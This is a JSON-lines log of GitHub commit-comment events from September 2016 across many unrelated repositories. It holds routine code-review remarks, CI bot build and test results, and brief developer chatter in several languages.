{"id":"4541845420","type":"CommitCommentEvent","actor":{"login":"mistic100"},"repo":{"name":"invader7/jQuery-QueryBuilder"},"payload":{"comment":{"id":18968013,"position":null,"line":null,"path":null,"commit_id":"7970c9a23e5e3ac1a0831f439cdef1f8532dc9ea","created_at":"2016-09-09T19:09:18Z","updated_at":"2016-09-09T19:09:18Z","body":"With no answer from you I added it myself https://github.com/mistic100/jQuery-QueryBuilder/commit/78fc4c93b1bf7b5cfd18a42f8e344f9ddce63d4b"}},"created_at":"2016-09-09T19:09:18Z"}
{"id":"4541846059","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18968016,"position":null,"line":null,"path":null,"commit_id":"6d3c860d98bf76ed4885c2faa7168b97f407f081","created_at":"2016-09-09T19:09:25Z","updated_at":"2016-09-09T19:09:25Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#IsyWtG4RRY6EHZzWTCuF3Q"}},"created_at":"2016-09-09T19:09:25Z"}
{"id":"4541846613","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18968020,"position":null,"line":null,"path":null,"commit_id":"3b672492f38cc378fe86ee7e248eb70522ab142f","created_at":"2016-09-09T19:09:32Z","updated_at":"2016-09-09T19:09:32Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 425](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1182&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:35"}},"created_at":"2016-09-09T19:09:32Z"}
{"id":"4541850109","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18968031,"position":null,"line":null,"path":null,"commit_id":"ed4c923c97f4670357a999dc71ce493b4c8fda65","created_at":"2016-09-09T19:10:18Z","updated_at":"2016-09-09T19:10:18Z","body":"@fichtner your right, done that right away :)"}},"created_at":"2016-09-09T19:10:18Z"}
{"id":"4541860491","type":"CommitCommentEvent","actor":{"login":"NachoSoto"},"repo":{"name":"ReactiveCocoa/ReactiveCocoa"},"payload":{"comment":{"id":18968050,"position":null,"line":null,"path":null,"commit_id":"8d5f963f0705c849b9574fcdd5033426be16b3d8","created_at":"2016-09-09T19:12:29Z","updated_at":"2016-09-09T19:12:29Z","body":"We have them at the project level, we shouldn't repeat them for each target."}},"created_at":"2016-09-09T19:12:29Z"}
{"id":"4541861183","type":"CommitCommentEvent","actor":{"login":"vutran"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18968051,"position":17,"line":14,"path":".editorconfig","commit_id":"d1600bdbb4deb4ba28ba2aac4d5ad4441be5adeb","created_at":"2016-09-09T19:12:38Z","updated_at":"2016-09-09T19:12:38Z","body":"I think using `<br/>` is a lot better than an empty space. The trade off is any potential spaces that may be present that isn't really necessary."}},"created_at":"2016-09-09T19:12:38Z"}
{"id":"4541865081","type":"CommitCommentEvent","actor":{"login":"NattyE"},"repo":{"name":"NattyE/nlstimedist"},"payload":{"comment":{"id":18968060,"position":null,"line":null,"path":null,"commit_id":"a9315d3a20b6dc35ef08ed41a7b3e02dfc85788e","created_at":"2016-09-09T19:13:29Z","updated_at":"2016-09-09T19:13:29Z","body":"Fixes #12 "}},"created_at":"2016-09-09T19:13:29Z"}
{"id":"4541865232","type":"CommitCommentEvent","actor":{"login":"rtdp"},"repo":{"name":"thetizzo/thetizzo.github.io"},"payload":{"comment":{"id":18968061,"position":null,"line":null,"path":null,"commit_id":"f810a23c122cb558a28cd3c62ed8377cb09a1cad","created_at":"2016-09-09T19:13:32Z","updated_at":"2016-09-09T19:13:32Z","body":"Had so much trouble by this same issue. Googled. Got your article. Found it to be 404. Searched. Searched. Finally this commit. Awaiting :)"}},"created_at":"2016-09-09T19:13:32Z"}
{"id":"4541865795","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18968063,"position":null,"line":null,"path":null,"commit_id":"ff12939bee168cd9aff19d766ecedb0e595bb2b0","created_at":"2016-09-09T19:13:39Z","updated_at":"2016-09-09T19:13:39Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3919\n"}},"created_at":"2016-09-09T19:13:39Z"}
{"id":"4541866253","type":"CommitCommentEvent","actor":{"login":"jhurwitz"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":18968064,"position":118,"line":118,"path":"templates/zerver/about.html","commit_id":"e7beba78ea3f62b4420f872697d3c3c97bd2c92f","created_at":"2016-09-09T19:13:44Z","updated_at":"2016-09-09T19:13:44Z","body":"I think this link is wrong?"}},"created_at":"2016-09-09T19:13:44Z"}
{"id":"4541867261","type":"CommitCommentEvent","actor":{"login":"tapasju"},"repo":{"name":"tapasju/hello-world"},"payload":{"comment":{"id":18968067,"position":null,"line":null,"path":null,"commit_id":"5c79332b841679338a9dfd59d1faff2c8ede2f7d","created_at":"2016-09-09T19:13:57Z","updated_at":"2016-09-09T19:13:57Z","body":"I will back soon."}},"created_at":"2016-09-09T19:13:57Z"}
{"id":"4541867376","type":"CommitCommentEvent","actor":{"login":"jhurwitz"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":18968068,"position":67,"line":67,"path":"templates/zerver/about.html","commit_id":"e7beba78ea3f62b4420f872697d3c3c97bd2c92f","created_at":"2016-09-09T19:13:58Z","updated_at":"2016-09-09T19:13:58Z","body":"Why is only this line translated?"}},"created_at":"2016-09-09T19:13:58Z"}
{"id":"4541868183","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18968071,"position":null,"line":null,"path":null,"commit_id":"df4a3cd95507bdbe17c38c6ebf3c3c1b8bbae5ac","created_at":"2016-09-09T19:14:09Z","updated_at":"2016-09-09T19:14:09Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-yokozuna/builds/1917\n"}},"created_at":"2016-09-09T19:14:09Z"}
{"id":"4541870203","type":"CommitCommentEvent","actor":{"login":"jhurwitz"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":18968078,"position":11,"line":11,"path":"templates/zerver/about.html","commit_id":"e7beba78ea3f62b4420f872697d3c3c97bd2c92f","created_at":"2016-09-09T19:14:34Z","updated_at":"2016-09-09T19:14:34Z","body":"Maybe link to https://zulip.com/features/ or https://zulip.com/hello/ or another longer list of features?"}},"created_at":"2016-09-09T19:14:34Z"}
{"id":"4541870787","type":"CommitCommentEvent","actor":{"login":"GoldenJoe"},"repo":{"name":"calmcom/AlamofireImage"},"payload":{"comment":{"id":18968079,"position":null,"line":null,"path":null,"commit_id":"0469d9ebab544478ba6644a9881aba3833ce1a86","created_at":"2016-09-09T19:14:41Z","updated_at":"2016-09-09T19:14:41Z","body":"I must have downloaded a weird commit. I get the error \"Type ParameterEncoding has no member url\""}},"created_at":"2016-09-09T19:14:41Z"}
{"id":"4541872641","type":"CommitCommentEvent","actor":{"login":"linas"},"repo":{"name":"linuxmint/systemd-rosa"},"payload":{"comment":{"id":18968090,"position":null,"line":null,"path":null,"commit_id":"50d0f45f22494e004b927060bc0fc2d32136dee6","created_at":"2016-09-09T19:15:04Z","updated_at":"2016-09-09T19:15:04Z","body":"ported from https://github.com/linuxmint/systemd-betsy/commit/f7ab85f1e1169ac1598dfc1fba1c01063840b3c5"}},"created_at":"2016-09-09T19:15:04Z"}
{"id":"4541878993","type":"CommitCommentEvent","actor":{"login":"evil-at-wow"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":18968104,"position":null,"line":null,"path":null,"commit_id":"9ad062499da2e91dfc7b8d05855ea099bbacdf7e","created_at":"2016-09-09T19:16:22Z","updated_at":"2016-09-09T19:16:22Z","body":"Huh? You had to rebase it all the way back to November 2014, almost 2 years ago? I'm also intrigued by the fact that you had no other choice. What were you trying to do that forced you to rebase?\r\n\r\nPlease tell me it's because you've finally finished that time machine"}},"created_at":"2016-09-09T19:16:22Z"}
{"id":"4541879735","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18968107,"position":null,"line":null,"path":null,"commit_id":"4ee9d8a8129320b38149552781f6d47504e44d15","created_at":"2016-09-09T19:16:31Z","updated_at":"2016-09-09T19:16:31Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ee9d8a8129320b38149552781f6d47504e44d15-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ee9d8a8129320b38149552781f6d47504e44d15-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T19:16:31Z"}
{"id":"4541883891","type":"CommitCommentEvent","actor":{"login":"realronchi"},"repo":{"name":"AgtLucas/congenial-robot"},"payload":{"comment":{"id":18968116,"position":null,"line":null,"path":null,"commit_id":"4be9a923cbd3ec5b262aeb719a4eba6ccdd8039d","created_at":"2016-09-09T19:17:25Z","updated_at":"2016-09-09T19:17:25Z","body":"HUE BR!\r\n"}},"created_at":"2016-09-09T19:17:25Z"}
{"id":"4541885937","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18968128,"position":null,"line":null,"path":null,"commit_id":"fa7586d7bd4e55017e63fdd955de2e4c782f2be2","created_at":"2016-09-09T19:17:53Z","updated_at":"2016-09-09T19:17:53Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-MacOS-10.9-clang: OK (2322 of 2328 tests passed, 0 test warnings)\n\n * 6 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.74%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T19:17:53Z"}
{"id":"4541887615","type":"CommitCommentEvent","actor":{"login":"mdiep"},"repo":{"name":"ReactiveCocoa/ReactiveCocoa"},"payload":{"comment":{"id":18968134,"position":null,"line":null,"path":null,"commit_id":"8d5f963f0705c849b9574fcdd5033426be16b3d8","created_at":"2016-09-09T19:18:15Z","updated_at":"2016-09-09T19:18:15Z","body":"They're not set in the target from what I can tell in Xcode. They're only set in the project."}},"created_at":"2016-09-09T19:18:15Z"}
{"id":"4541888331","type":"CommitCommentEvent","actor":{"login":"jwagenleitner"},"repo":{"name":"apache/groovy"},"payload":{"comment":{"id":18968136,"position":43,"line":43,"path":"src/main/org/apache/groovy/metaclass/Realm.java","commit_id":"9be5459c906ba106f235d40ebe0f25b7193a0467","created_at":"2016-09-09T19:18:25Z","updated_at":"2016-09-09T19:18:25Z","body":"I know this is just some experimental work, so if you aren't looking for any feedback let me know and I wont comment anymore.  Just thought I'd point out the license header is the older style and would be good to use the updated version (no years).  Also noticed the missing generic type for the type Class argument.\r\n\r\nAm curious if `Realm` (in combo with ClassValue) is meant to replace `ClassInfo`?"}},"created_at":"2016-09-09T19:18:25Z"}
{"id":"4541890532","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18968147,"position":null,"line":null,"path":null,"commit_id":"6647931a6bdc1f37f4da654e21826c2a75dbb3aa","created_at":"2016-09-09T19:18:53Z","updated_at":"2016-09-09T19:18:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#UfdJ6WMOR1mEL9bzoyZPwg"}},"created_at":"2016-09-09T19:18:53Z"}
{"id":"4541890630","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18968148,"position":null,"line":null,"path":null,"commit_id":"a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0","created_at":"2016-09-09T19:18:54Z","updated_at":"2016-09-09T19:18:54Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1499 of 1499 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.66%25-green.svg)</a>\n"}},"created_at":"2016-09-09T19:18:54Z"}
{"id":"4541893973","type":"CommitCommentEvent","actor":{"login":"NachoSoto"},"repo":{"name":"ReactiveCocoa/ReactiveCocoa"},"payload":{"comment":{"id":18968157,"position":null,"line":null,"path":null,"commit_id":"8d5f963f0705c849b9574fcdd5033426be16b3d8","created_at":"2016-09-09T19:19:35Z","updated_at":"2016-09-09T19:19:35Z","body":"Oh okay! I misread the diff then."}},"created_at":"2016-09-09T19:19:35Z"}
{"id":"4541897585","type":"CommitCommentEvent","actor":{"login":"chrisabrams"},"repo":{"name":"f12/structure-api"},"payload":{"comment":{"id":18968171,"position":18,"line":454,"path":"src/models/root.js","commit_id":"ad9f01727f6151caa6b82f8581dceebb737ca556","created_at":"2016-09-09T19:20:25Z","updated_at":"2016-09-09T19:20:25Z","body":"Excellent!"}},"created_at":"2016-09-09T19:20:25Z"}
{"id":"4541903436","type":"CommitCommentEvent","actor":{"login":"matias09"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18968193,"position":11,"line":11,"path":"Tetris/InputHandlerFactory.cpp","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T19:21:40Z","updated_at":"2016-09-09T19:21:40Z","body":"Este metodo te devuelve una instancia de la libreria o mejor dicho de la implementacion que se va a utilizar para capturar los eventos de Entrada por botones presionados del usuario. En SDL no encontre como inicializar solamente los eventos de teclado, por eso cuando veas la implementacion, esta inicializado EVENT completo."}},"created_at":"2016-09-09T19:21:40Z"}
{"id":"4541903440","type":"CommitCommentEvent","actor":{"login":"MyzelYam"},"repo":{"name":"MyzelYam/SuperVanish"},"payload":{"comment":{"id":18968194,"position":null,"line":null,"path":null,"commit_id":"b2b0ab2c23e17f02ad4e181126e0ea53d17b5242","created_at":"2016-09-09T19:21:40Z","updated_at":"2016-09-09T19:21:40Z","body":"Not working since DynmapPlugin#postPlayerJoinQuitToWeb doesn't output anything"}},"created_at":"2016-09-09T19:21:40Z"}
{"id":"4541905355","type":"CommitCommentEvent","actor":{"login":"jcarpent"},"repo":{"name":"stack-of-tasks/pinocchio"},"payload":{"comment":{"id":18968199,"position":24,"line":24,"path":"doc/additionalDoc/GettingStarted/install.dox","commit_id":"b57cb3efa6bf58593c81d909cf1f3334a54c1449","created_at":"2016-09-09T19:22:06Z","updated_at":"2016-09-09T19:22:06Z","body":"We must have one single page to relate installation. I think it must not appear in the doc itself, but on the website directly. \r\nA copy of instructions can be find in a file INSTALL for example."}},"created_at":"2016-09-09T19:22:06Z"}
{"id":"4541907056","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"linuxdeepin/deepin-desktop-schemas"},"payload":{"comment":{"id":18968206,"position":null,"line":null,"path":null,"commit_id":"d0d7e169a4b5699393f1be1fcf39a2178c445b27","created_at":"2016-09-09T19:22:27Z","updated_at":"2016-09-09T19:22:27Z","body":"Oops. Seems I forgot to update my package to **v3.0.10**, sorry! :wink: "}},"created_at":"2016-09-09T19:22:27Z"}
{"id":"4541909022","type":"CommitCommentEvent","actor":{"login":"matias09"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18968212,"position":11,"line":11,"path":"Tetris/InputHandlerFactory.cpp","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T19:22:52Z","updated_at":"2016-09-09T19:22:52Z","body":"En este momento, esta hardcodeado en SDL porque es la unica que tengo. Lo pense de esa manera por si en un futuro tengo que cambiar la libreria o Hacer una propia por el simple hecho de ganar experiencia."}},"created_at":"2016-09-09T19:22:52Z"}
{"id":"4541911322","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18968221,"position":null,"line":null,"path":null,"commit_id":"c33fb1a09d7d074324c3b04a43f3b055f1e21edc","created_at":"2016-09-09T19:23:22Z","updated_at":"2016-09-09T19:23:22Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#JO1BPQ0oR5eDv0SobjfREg"}},"created_at":"2016-09-09T19:23:22Z"}
{"id":"4541914599","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18968237,"position":null,"line":null,"path":null,"commit_id":"fe65ba628f2d6a84d469450cfd3265ef7b0b957b","created_at":"2016-09-09T19:24:05Z","updated_at":"2016-09-09T19:24:05Z","body":"@pb00068 \r\nGL with your patch.\r\n\r\nIt seems we both enjoy tweaking up history stats...it's an interesting area in computer chess.\r\n\r\nI like the idea of using an array...I would actually considered this a simplification, since we only need to update the formula at one place, but I am no maintainer.\r\n\r\n"}},"created_at":"2016-09-09T19:24:05Z"}
{"id":"4541916272","type":"CommitCommentEvent","actor":{"login":"benipalbaljinder"},"repo":{"name":"benipalbaljinder/recipes"},"payload":{"comment":{"id":18968240,"position":5,"line":10,"path":"cake-recipe.txt","commit_id":"4dd259705e4ad01dd27d7d0b7f322e691f855d24","created_at":"2016-09-09T19:24:27Z","updated_at":"2016-09-09T19:24:27Z","body":"\"Canola\" is misspelled."}},"created_at":"2016-09-09T19:24:27Z"}
{"id":"4541917397","type":"CommitCommentEvent","actor":{"login":"matias09"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18968245,"position":9,"line":9,"path":"Tetris/InputHandlerFactory.h","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T19:24:42Z","updated_at":"2016-09-09T19:24:42Z","body":"Se entiende, pero no quiero pensar en hacer cosas estaticas cuando Creo que no vale la pena y directamente prefiero ocupar un poco mas el Stack. Prefiero dejar los metodo estaticos para futuros callbacks en el caso que los necesite."}},"created_at":"2016-09-09T19:24:42Z"}
{"id":"4541920185","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18968254,"position":11,"line":11,"path":"Tetris/InputHandlerFactory.cpp","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T19:25:17Z","updated_at":"2016-09-09T19:25:17Z","body":"Ok, pero dónde vas a hacer el delete de este puntero? en algún otro lado del código, donde se recibe el puntero, debe hacerse un delete cuando se cierra el juego."}},"created_at":"2016-09-09T19:25:17Z"}
{"id":"4541921762","type":"CommitCommentEvent","actor":{"login":"dubhater"},"repo":{"name":"vapoursynth/vapoursynth"},"payload":{"comment":{"id":18968256,"position":49,"line":2034,"path":"src/core/simplefilters.c","commit_id":"0d474ff3cf0794584098b224b3a97a3c5c254ac9","created_at":"2016-09-09T19:25:37Z","updated_at":"2016-09-09T19:25:37Z","body":"But the bytes past the edge have random values. They will affect the results."}},"created_at":"2016-09-09T19:25:37Z"}
{"id":"4541921927","type":"CommitCommentEvent","actor":{"login":"tjade273"},"repo":{"name":"nexusdev/dapple-core"},"payload":{"comment":{"id":18968258,"position":null,"line":null,"path":null,"commit_id":"6e42006958eb9af8f45df91a5460ea07ad04f930","created_at":"2016-09-09T19:25:39Z","updated_at":"2016-09-09T19:25:39Z","body":"Why is `uint` now displayed as hex? If a user wants to see the `uint` in hex, can't they just cast to `bytes32`? I think base 10 is much more readable for integers. "}},"created_at":"2016-09-09T19:25:39Z"}
{"id":"4541923081","type":"CommitCommentEvent","actor":{"login":"matias09"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18968260,"position":null,"line":null,"path":null,"commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T19:25:56Z","updated_at":"2016-09-09T19:25:56Z","body":"Muchas Gracias.\r\nCuando mencionaste lo de los Destructores en la charla sabia que me los ibas a marcar al toque. Simplemente me olvide de agregarlos."}},"created_at":"2016-09-09T19:25:56Z"}
{"id":"4541927224","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18968272,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T19:26:50Z","updated_at":"2016-09-09T19:26:50Z","body":"Could you change this from this:\r\n``\r\n    <string-array name=\"enabled_networks_except_lte_choices\" translatable=\"false\">\r\n    \t <item>@string/network_wcdma_only</item>\r\n    \t <item>@string/network_gsm_only</item>\r\n    \t <item>@string/network_wcdma_pref</item>\r\n    </string-array>\r\n``\r\nTo this?:\r\n``\r\n    <string-array name=\"enabled_networks_except_lte_choices\" translatable=\"false\">\r\n    \t <item>@string/preferred_network_mode_wcdma_only_choice</item>\r\n    \t <item>@string/preferred_network_mode_gsm_only_choice</item>\r\n    \t <item>@string/preferred_network_mode_gsm_wcdma_preferred_choice</item>\r\n    </string-array>\r\n``"}},"created_at":"2016-09-09T19:26:50Z"}
{"id":"4541927267","type":"CommitCommentEvent","actor":{"login":"Thanood"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":18968273,"position":null,"line":null,"path":null,"commit_id":"277f7cfa174e74cd4f3839df7e269ba0daee5047","created_at":"2016-09-09T19:26:50Z","updated_at":"2016-09-09T19:26:50Z","body":"Oh.. Thanks, didn't notice that. :smile:"}},"created_at":"2016-09-09T19:26:50Z"}
{"id":"4541927480","type":"CommitCommentEvent","actor":{"login":"joycemenezes1997"},"repo":{"name":"joycemenezes1997/Bibliotec"},"payload":{"comment":{"id":18968274,"position":null,"line":null,"path":null,"commit_id":"cc601b36a9553c12ab1089779f8807ba38694cd3","created_at":"2016-09-09T19:26:53Z","updated_at":"2016-09-09T19:26:53Z","body":"+14/09/2016 | Nova Reunião, inicialização do aplicativo. Onde o grupo discutirá á cerca do aperfeiçoamento de wireframe, tais como , o que deve ser melhorado , mudado etc."}},"created_at":"2016-09-09T19:26:53Z"}
{"id":"4541928302","type":"CommitCommentEvent","actor":{"login":"gurch101"},"repo":{"name":"tulimaki/shoop"},"payload":{"comment":{"id":18968276,"position":22,"line":643,"path":"shuup/core/models/_orders.py","commit_id":"b845cf5c434959b5dbe53bfe1b37a88d24515f60","created_at":"2016-09-09T19:27:07Z","updated_at":"2016-09-09T19:27:07Z","body":"remove comment"}},"created_at":"2016-09-09T19:27:07Z"}
{"id":"4541928391","type":"CommitCommentEvent","actor":{"login":"gurch101"},"repo":{"name":"tulimaki/shoop"},"payload":{"comment":{"id":18968277,"position":31,"line":673,"path":"shuup/core/models/_orders.py","commit_id":"b845cf5c434959b5dbe53bfe1b37a88d24515f60","created_at":"2016-09-09T19:27:08Z","updated_at":"2016-09-09T19:27:08Z","body":"ditto"}},"created_at":"2016-09-09T19:27:08Z"}
{"id":"4541928779","type":"CommitCommentEvent","actor":{"login":"gurch101"},"repo":{"name":"tulimaki/shoop"},"payload":{"comment":{"id":18968279,"position":25,"line":574,"path":"shuup/core/order_creator/_source.py","commit_id":"b845cf5c434959b5dbe53bfe1b37a88d24515f60","created_at":"2016-09-09T19:27:13Z","updated_at":"2016-09-09T19:27:13Z","body":"magic number should probably be defined as constant somewhere. Maybe `shuup.core.fields`?"}},"created_at":"2016-09-09T19:27:13Z"}
{"id":"4541929308","type":"CommitCommentEvent","actor":{"login":"martin-g"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":18968281,"position":31,"line":31,"path":"portlet-parent/wicketstuff-portlet/src/main/java/org/apache/wicket/portlet/WicketPortletConfig.java","commit_id":"2f930ffb0e24f4990def418e1aa1932803cb2f30","created_at":"2016-09-09T19:27:20Z","updated_at":"2016-09-09T19:27:20Z","body":"No need to iterate yourself, you could just pass it to `new HashMap(HERE)`"}},"created_at":"2016-09-09T19:27:20Z"}
{"id":"4541931657","type":"CommitCommentEvent","actor":{"login":"gurch101"},"repo":{"name":"tulimaki/shoop"},"payload":{"comment":{"id":18968288,"position":null,"line":null,"path":null,"commit_id":"b845cf5c434959b5dbe53bfe1b37a88d24515f60","created_at":"2016-09-09T19:27:50Z","updated_at":"2016-09-09T19:27:50Z","body":"can you add a test for the following scenario:\r\n```\r\nbuy 2 of a product with a base unit price of 29.264 refund 1 at 29.264 then refund 1 more at 29.264. The order total is 0.01. Should be 0.\r\n```"}},"created_at":"2016-09-09T19:27:50Z"}
{"id":"4541933305","type":"CommitCommentEvent","actor":{"login":"TaranpreetSinghRayat"},"repo":{"name":"TaranpreetSinghRayat/DoctorApp"},"payload":{"comment":{"id":18968297,"position":null,"line":null,"path":null,"commit_id":"29cabe8980ecc140ed891520543a46c6a329d4f9","created_at":"2016-09-09T19:28:14Z","updated_at":"2016-09-09T19:28:14Z","body":"whats going on here xD\r\n"}},"created_at":"2016-09-09T19:28:14Z"}
{"id":"4541935821","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18968305,"position":null,"line":null,"path":null,"commit_id":"5a97d8ecb7bf6ec8919d92331f62715033f72310","created_at":"2016-09-09T19:28:47Z","updated_at":"2016-09-09T19:28:47Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 426](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1183&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-09T19:28:47Z"}
{"id":"4541940556","type":"CommitCommentEvent","actor":{"login":"anvesh28"},"repo":{"name":"anvesh28/Pokemon-Exercise"},"payload":{"comment":{"id":18968324,"position":2,"line":2,"path":"README.md","commit_id":"fd832ec7824b93a5a2bf40f6b3231a320017f95c","created_at":"2016-09-09T19:29:49Z","updated_at":"2016-09-09T19:29:49Z","body":"As suggested input data is hard coded in BillGeneratorTest class. Please execute this JUnit test for output. The main flow of program is on PointOFSale.java and remaining subprograms are connected to this main program."}},"created_at":"2016-09-09T19:29:49Z"}
{"id":"4541942562","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18968331,"position":null,"line":null,"path":null,"commit_id":"5a97d8ecb7bf6ec8919d92331f62715033f72310","created_at":"2016-09-09T19:30:17Z","updated_at":"2016-09-09T19:30:17Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 426](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1183&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:30"}},"created_at":"2016-09-09T19:30:17Z"}
{"id":"4541943886","type":"CommitCommentEvent","actor":{"login":"aaarchmiller"},"repo":{"name":"aaarchmiller/Git_Started_Tutorial"},"payload":{"comment":{"id":18968335,"position":null,"line":null,"path":null,"commit_id":"8551db2bdb274be456200d36a3050f84f6cf0ca7","created_at":"2016-09-09T19:30:34Z","updated_at":"2016-09-09T19:30:34Z","body":"Bad idea John!"}},"created_at":"2016-09-09T19:30:34Z"}
{"id":"4541944293","type":"CommitCommentEvent","actor":{"login":"phueper"},"repo":{"name":"js-joda/js-joda"},"payload":{"comment":{"id":18968338,"position":5,"line":4,"path":"test/zone/CurrentEasternTimeZoneTest.js","commit_id":"1222e9699d49a0bd95e793b08497784a9d7b9cba","created_at":"2016-09-09T19:30:38Z","updated_at":"2016-09-09T19:30:38Z","body":"?? License change? ;-)"}},"created_at":"2016-09-09T19:30:38Z"}
